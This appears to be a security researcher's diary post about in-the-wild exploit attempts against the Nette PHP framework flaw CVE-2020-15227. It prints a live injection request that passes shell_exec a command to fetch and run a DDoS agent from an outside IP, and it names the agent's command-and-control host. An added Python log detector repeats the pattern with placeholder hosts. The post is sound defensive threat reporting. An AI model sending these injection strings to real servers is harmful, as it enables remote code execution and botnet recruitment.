Attacks against the "Nette" PHP framework CVE-2020-15227

    Published: 2024-07-12
    Last Updated: 2024-07-12 15:58:58 UTC
    by Johannes Ullrich (Version: 1)

    Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

    Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

    Today, I noticed yet another variation of an exploit for CVE-2020-15227:

     /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

    Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 
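    As an added example (not part of this diary), a small Python detector that flags the request pattern above in web-server access logs and pulls out the download URL for blocklisting; the log lines, IP addresses and download URL below are constructed placeholders, not the real indicators:

```python
import re
from urllib.parse import urlsplit, unquote

# Prefix of the Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# PHP functions that run OS commands; handing one of them to Nette's ?callback=
# parameter is the CVE-2020-15227 exploit pattern seen in the diary.
DANGEROUS_CALLBACKS = {"shell_exec", "exec", "system", "passthru", "popen", "proc_open"}

def parse_query(query: str) -> dict:
    """Split a raw query string on '&' only (';' belongs to the injected command)."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params

def inspect_request(target: str):
    """Return a finding dict if `target` matches the exploit pattern, else None."""
    parts = urlsplit(target)
    if "nette.micro" not in parts.path.lower():
        return None
    params = parse_query(parts.query)
    hit = {c.lower() for c in params.get("callback", [])} & DANGEROUS_CALLBACKS
    if not hit:
        return None
    cmd = params.get("cmd", [""])[0]
    urls = re.findall(r'https?://[^\s;&|\'"]+', cmd)  # payload download locations
    return {"callback": sorted(hit), "cmd": cmd, "urls": urls}

def scan_log(lines):
    """Return a list of (source_ip, finding) for every matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (finding := inspect_request(m.group("target"))):
            findings.append((m.group("ip"), finding))
    return findings

# Constructed sample log (RFC 5737 documentation addresses, placeholder script name).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jul/2024:10:01:07 +0000] "GET /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://192.0.2.10/agent.sh;chmod%20777%20agent.sh;./agent.sh HTTP/1.1" 404 153 "-" "curl/7.88.1"',
    '203.0.113.9 - - [12/Jul/2024:10:01:09 +0000] "GET /nette.micro/?callback=strtoupper&cmd=x HTTP/1.1" 200 10 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for ip, f in scan_log(SAMPLE_LOG):
        print(f"{ip}: callback={f['callback']} urls={f['urls']}")
```

The third sample line shows why the check keys on the callback name rather than on the path alone: a harmless callback is not reported.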

    The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

    • The binary uses crontab and systemd for persistence.
    • It uses sosbot.icu on port 1314 for command and control.

    [1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
    [2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
